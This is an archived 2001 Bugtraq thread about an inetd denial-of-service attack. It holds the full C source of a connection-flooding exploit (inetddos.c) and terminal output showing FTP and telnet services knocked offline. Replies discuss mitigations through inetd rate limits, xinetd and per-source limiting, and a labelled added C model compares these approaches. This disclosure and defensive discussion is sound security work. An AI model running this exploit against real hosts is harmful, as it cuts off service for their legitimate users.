6143919 2001-02-25 19:26 +0300  /44 lines/ Serega[linux] <linux@IHGROUP.RU>
Sent by: joel@lysator.liu.se
Imported: 2001-02-26  23:35  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: linux@IHGROUP.RU
Recipient: Bugtraq (import) <15627>
Subject: inetd DoS exploit
------------------------------------------------------------
Name:  inetd DoS exploit
Author: Serega[Linux]


[ser@ihg prog]$ ./pscaner -h 127.0.0.1      /* it's my port scanner */
Open ports on [127.0.0.1]
-----------------------------
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300
-----------------------------

[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.

[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 127.0.0.1 21
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
login:

[ser@ihg prog]$ ./inetddos 127.0.0.1 23
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused

--
/*
 * mailto:linux@ihgroup.ru
 * ICQ: 64432299
 * Home Page: http://127.0.0.1
*/
(6143919) --------------------------------(Rewrapped)
Attachment (text/x-c) in text 6143920
Comment in text 6147997 by Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Comment in text 6148375 by Peter Werner <peterw@DOCUMENTA.COM.AU>
Comment in text 6148607 by Peter van Dijk <peter@DATALOSS.NL>
6143920 2001-02-25 19:26 +0300  /133 lines/ Serega[linux] <linux@IHGROUP.RU>
Attachment filename: "inetddos.c"
Imported: 2001-02-26  23:35  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: linux@IHGROUP.RU
Recipient: Bugtraq (import) <15628>
Attachment (text/plain) to text 6143919
Subject: Attachment (inetddos.c) to: inetd DoS exploit
------------------------------------------------------------
/*
----------------------------------
Inetd DoS exploit bY Serega[Linux]
IHG Project www.ihgroup.ru
mailto:linux@ihgroup.ru
----------------------------------

Usage: ./inetddos <host> <port>

example:

[ser@ihg prog]$ ./pscaner -h 127.0.0.1      /* it's my port scanner */
-----------------------------
Open ports on [127.0.0.1]
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300
-----------------------------

[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.

[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 127.0.0.1 21
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
login:

[ser@ihg prog]$ ./inetddos 127.0.0.1 23
DoS OK
[ser@ihg prog]$ telnet 127.0.0.1 23
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <signal.h>


void time_out(int sig);
int timeout=5;
char logo[512];
int sockfd;

/* Open one TCP connection to host:port and close it again.
 * Prints an error and exits as soon as a connection is refused. */
int DoS (char *host, int port)
{
struct sockaddr_in serv;
struct hostent *h;

memset(&serv, 0, sizeof(serv));
serv.sin_family = AF_INET;
if ((h=gethostbyname(host)) == NULL)
	{
	perror(host);
	exit(1);
	}

/* gethostbyname() also accepts dotted-quad addresses, so h is valid here */
memcpy(&serv.sin_addr, h->h_addr, sizeof(serv.sin_addr));
serv.sin_port = htons(port);

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
    {
    perror ("socket error");
    exit(1);
    }

/* give up on a connect() that hangs for longer than `timeout' seconds */
signal(SIGALRM, time_out);
alarm(timeout);

if (connect (sockfd, (struct sockaddr*)&serv, sizeof(serv)) != 0)
	{
	close(sockfd);
	perror(host);
	exit(1);
	}

alarm(0);
close(sockfd);
return(1);
}



void time_out (int sig)
{
	close(sockfd);
	printf("timeout\n");
	exit(-1);
}


void usage(char *h)
{
printf("----------------------------------\n"
       "Inetd DoS exploit bY Serega[Linux]\n"
       "IHG Project www.ihgroup.ru\n"
       "mailto:linux@ihgroup.ru\n"
       "----------------------------------\n");
printf("\nUsage: %s <host> <port>\n\n", h);
exit(1);
}


int main(int argc, char **argv)
{
int i;
if (argc<3) usage(argv[0]);

/* connect and disconnect up to 999 times in a row; the first refused
 * connection makes DoS() exit, so the line below is reached only if
 * every attempt succeeded */
for (i=1; i<1000; i++)
DoS(argv[1], atoi(argv[2]));
printf("DoS failed\n");
return 0;
}
(6143920) --------------------------------(Rewrapped)
6147997 2001-02-26 16:39 -0500  /55 lines/ Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Sent by: joel@lysator.liu.se
Imported: 2001-02-27  19:51  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: jose@BIOCSERVER.BIOC.CWRU.EDU
Recipient: Bugtraq (import) <15635>
Comment on text 6143919 by Serega[linux] <linux@IHGROUP.RU>
Subject: Re: inetd DoS exploit
------------------------------------------------------------
From: Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0102261633260.29130-100000@biocserver.BIOC.CWRU.Edu>

On Sun, 25 Feb 2001, Serega[linux] wrote:

> [ser@ihg prog]$ cc inetddos.c -o inetddos
> [ser@ihg prog]$ ./inetddos 127.0.0.1 21
> DoS OK

(code snipped)

*hrm* ok. this is old. see also the inetd process table attack.
http://www.interesting-people.org/199902/0069.html

this can be stemmed in a number of ways:

1] using inetd, rate limit the connections. change a line like

telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd

to

telnet  stream  tcp     nowait.1  root    /usr/libexec/telnetd    telnetd

this will maximize the number of connections per minute on that
service:

(from an inetd manpage on OpenBSD 2.8)

The optional ``max'' suffix (separated from ``wait'' or ``nowait'' by
a dot) specifies the maximum number of server instances that may be
spawned from inetd within an interval of 60 seconds.  When omitted,
``max'' defaults to 40.

2] inetd -R. (again from OpenBSD's 2.8 manpage for inetd)

     -R rate
             Specify the maximum number of times a service can be invoked
	     in one minute; the default is 256.

i believe the inetd in Linux, which is derived from BSD's inetd, has
these features. at least the last time i looked at the code (eons
ago) it did.

3] move to xinetd or other similar programs which have rate limiting.
solar designer has a neat-o patch for xinetd that can do max-per-IP
limits. very nice ... :)

anyhow, old, mitigations are already in place, just learn to use them.

____________________________
jose nazario						     jose@cwru.edu
	      	     PGP: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
				       PGP key ID 0xFD37F4E5 (pgp.mit.edu)
(6147997) --------------------------------(Rewrapped)
Comment in text 6149616 by David Malone <dwmalone@MATHS.TCD.IE>
Comment in text 6149708 by Charles M. Hannum <root@IHACK.NET>
6149616 2001-02-27 19:33 +0000  /23 lines/ David Malone <dwmalone@MATHS.TCD.IE>
Sent by: joel@lysator.liu.se
Imported: 2001-02-28  09:28  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: dwmalone@MATHS.TCD.IE
Recipient: Bugtraq (import) <15671>
Comment on text 6147997 by Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Subject: Re: inetd DoS exploit
------------------------------------------------------------
From: David Malone <dwmalone@MATHS.TCD.IE>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010227193341.A88613@walton.maths.tcd.ie>

On Mon, Feb 26, 2001 at 04:39:58PM -0500, Jose Nazario wrote:
> 3] move to xinetd or other similar programs which have rate limiting.
> solar designer has a neat-o patch for xinetd that can do max-per-IP
> limits. very nice ... :)

FreeBSD's inetd has a selection of features like this (maximum
number of invocations of a service, max number of invocations per
minute and the max number of invocations per minute per ip).

I think these features must be relatively recent additions to inetd
'cos the syntax for them is slightly different in FreeBSD and
OpenBSD. (A little poking around CVS trees shows that the max-child
feature was originally added in NetBSD 1993 and added to FreeBSD
in 1996. The overall rate limit and rate/ip limit may have originated
in FreeBSD at a later date - possibly cogged from xinetd.)

	David.
(6149616) ------------------------------------------
6149708 2001-02-27 12:18 -0800  /32 lines/ Charles M. Hannum <root@IHACK.NET>
Sent by: joel@lysator.liu.se
Imported: 2001-02-28  09:46  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: root@IHACK.NET
Recipient: Bugtraq (import) <15674>
Comment on text 6147997 by Jose Nazario <jose@BIOCSERVER.BIOC.CWRU.EDU>
Subject: Re: inetd DoS exploit
------------------------------------------------------------
From: "Charles M. Hannum" <root@IHACK.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010227121814.E29838@mail.netbsd.org>

On Mon, Feb 26, 2001 at 04:39:58PM -0500, Jose Nazario wrote:

> this can be stemmed in a number of ways:
>
> 1] using inetd, rate limit the connections. change a line like
>
> telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
>
> to
>
> telnet  stream  tcp     nowait.1  root    /usr/libexec/telnetd    telnetd
>
> this will maximize the number of connections per minute on that service:
>
> (from an inetd manpage on OpenBSD 2.8)

Actually, that was implemented in NetBSD.  But regardless, it's not
sufficient.  All that does is adjust the threshold at which inetd
decides the server is `looping' and disables it.  Setting it to 1, for
example, just makes the problem *much* worse.  Setting it to, e.g.,
1000000 will effectively disable the hack, and is a reasonable
workaround if your machine can deal.

The real answer is to implement proper rate-limiting instead.  A bonus
would be to implement it in a library (say, libwrap) that standalone
and `wait' services can also use.
(6149708) ------------------------------------------
6148375 2001-02-27 09:39 +1100  /81 lines/ Peter Werner <peterw@DOCUMENTA.COM.AU>
Sent by: joel@lysator.liu.se
Imported: 2001-02-27  21:43  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: peterw@DOCUMENTA.COM.AU
Recipient: Bugtraq (import) <15642>
Comment on text 6143919 by Serega[linux] <linux@IHGROUP.RU>
Subject: Re: inetd DoS exploit
------------------------------------------------------------
From: Peter Werner <peterw@DOCUMENTA.COM.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <010701c0a044$edf2b360$0900a8c0@documenta.com.au>

NAME
     inetd - internet ``super-server''

SYNOPSIS
     inetd [-d] [-R rate] [configuration file]

....

    -R rate
             Specify the maximum number of times a service can be invoked in
             one minute; the default is 256.

isn't this a feature of inetd?

ie, it stops answering requests for a service when the maximum
number has been reached?

did you wait ~10 minutes to try to reconnect? or does inetd/box
actually need to be restarted?

----- Original Message -----
From: Serega[linux] <linux@IHGROUP.RU>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Monday, February 26, 2001 3:26 AM
Subject: [BUGTRAQ] inetd DoS exploit


> Name:  inetd DoS exploit
> Author: Serega[Linux]
>
>
> [ser@ihg prog]$ ./pscaner -h 127.0.0.1      /* it's my port scanner */
> Open ports on [127.0.0.1]
> -----------------------------
> [21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
> [23] OPEN :
> [25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300
> -----------------------------
>
> [ser@ihg prog]$ telnet 127.0.0.1 21
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
>
> [ser@ihg prog]$ cc inetddos.c -o inetddos
> [ser@ihg prog]$ ./inetddos 127.0.0.1 21
> DoS OK
> [ser@ihg prog]$ telnet 127.0.0.1 21
> Trying 127.0.0.1...
> telnet: Unable to connect to remote host: Connection refused
> [ser@ihg prog]$ telnet 127.0.0.1 23
> Trying 127.0.0.1...
> Connected to 127.0.0.1.
> Escape character is '^]'.
> login:
>
> [ser@ihg prog]$ ./inetddos 127.0.0.1 23
> DoS OK
> [ser@ihg prog]$ telnet 127.0.0.1 23
> Trying 127.0.0.1...
> telnet: Unable to connect to remote host: Connection refused
>
> --
> /*
>  * mailto:linux@ihgroup.ru
>  * ICQ: 64432299
>  * Home Page: http://127.0.0.1
> */
>
(6148375) ------------------------------------------
6148607 2001-02-27 02:02 +0100  /22 lines/ Peter van Dijk <peter@DATALOSS.NL>
Sent by: joel@lysator.liu.se
Imported: 2001-02-27  22:48  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: peter@DATALOSS.NL
Recipient: Bugtraq (import) <15648>
Comment on text 6143919 by Serega[linux] <linux@IHGROUP.RU>
Subject: Re: inetd DoS exploit
------------------------------------------------------------
From: Peter van Dijk <peter@DATALOSS.NL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010227020216.C21881@dataloss.nl>

On Sun, Feb 25, 2001 at 07:26:07PM +0300, Serega[linux] wrote:
> Name:  inetd DoS exploit
> Author: Serega[Linux]

This is a *very* old and widely-known inetd DoS. It comes down to making
inetd's ratelimiting kick in. Recent inetd's (like the one that comes
with FreeBSD) also have concurrencylimiting, which makes sense.
Ratelimiting has never prevented a malicious client from crashing a
server.

inetd replacements like xinetd and tcpserver
(http://cr.yp.to/ucspi-tcp.html) have real ratelimiting which
prevents *real* problems, as opposed to inetd ratelimiting which
actually only *creates* problems.

Greetz, Peter.
(6148607) ------------------------------------------
Comment in text 6149555 by bert hubert <ahu@DS9A.NL>
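The disagreement in this thread is whether inetd's ``max'' suffix (Jose Nazario's `nowait.N`, or `-R rate`) is rate limiting at all: Charles Hannum and Peter van Dijk say it is only the threshold at which inetd decides a server is looping and switches it off for everyone. The C model below is an added example, not code from inetd or from any poster, comparing that global threshold with a per-source limiter of the kind credited to xinetd, tcpserver and FreeBSD's inetd. The 60-second window and default of 40 come from the manpage quoted above; DISABLE_SECS (600, the "~10 minutes" Peter Werner asks about), MAX_SRC and the 10.0.0.x addresses are assumptions.

```c
/* Added example (not inetd's code): two reactions to the connection burst
 * shown in the thread. 40 per 60 s follows the quoted manpage; the
 * 10-minute disable, the source table and the addresses are assumed. */
#include <string.h>

#define WINDOW 60        /* seconds per counting interval */
#define DISABLE_SECS 600 /* assumed: how long a "looping" service stays off */
#define MAX_SRC 8        /* constructed limit on distinct client addresses */

/* Model 1: the nowait.N ``max'' suffix. One global counter; once it is
 * exceeded inetd treats the server as looping and refuses everyone. */
struct looping_svc { int max, count; long win_start, off_until; };

int looping_accept(struct looping_svc *s, long now)  /* 1 = served */
{
    if (now < s->off_until) return 0;
    if (now - s->win_start >= WINDOW) { s->win_start = now; s->count = 0; }
    if (++s->count <= s->max) return 1;
    s->off_until = now + DISABLE_SECS;   /* whole service disabled */
    return 0;
}

/* Model 2: per-source rate limit. Each client address has its own counter,
 * so the abusive one is refused while other clients keep being served. */
struct src { const char *ip; int count; long win_start; };

int per_source_accept(struct src *tbl, int max, const char *ip, long now)
{
    for (int i = 0; i < MAX_SRC; i++) {
        if (tbl[i].ip == NULL) { tbl[i].ip = ip; tbl[i].count = 0; tbl[i].win_start = now; }
        if (strcmp(tbl[i].ip, ip) != 0) continue;
        if (now - tbl[i].win_start >= WINDOW) { tbl[i].win_start = now; tbl[i].count = 0; }
        return ++tbl[i].count <= max;
    }
    return 0;  /* table full: refuse the unknown source */
}

/* Constructed replay of the thread's scenario: one client makes `burst'
 * connections at t=0, then a different client connects at t=1.
 * Returns 1 if that second client is served. */
int victim_served_looping(int max, int burst)
{
    struct looping_svc s = { max, 0, 0, 0 };
    for (int i = 0; i < burst; i++) looping_accept(&s, 0);
    return looping_accept(&s, 1);
}

int victim_served_per_source(int max, int burst)
{
    struct src tbl[MAX_SRC] = {{0}};
    for (int i = 0; i < burst; i++) per_source_accept(tbl, max, "10.0.0.1", 0);
    return per_source_accept(tbl, max, "10.0.0.2", 1);
}
```

With the default of 40 the burst knocks the service out for every client; with `nowait.1` a single earlier connection is enough to do so, which is Hannum's objection, and only the per-source limiter refuses the offender alone.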